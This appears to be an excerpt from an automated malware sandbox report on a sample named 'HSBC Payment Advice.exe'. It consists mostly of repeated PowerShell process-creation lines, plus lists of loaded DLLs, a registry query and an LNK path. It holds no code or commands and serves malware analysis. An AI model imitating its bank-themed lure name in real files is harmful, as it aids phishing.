    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: edgegdi.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: textshaping.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: typhaceae.lnk.0.dr | LNK file: ..\..\..\seralbumen\Retslgeraad.Gun38
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
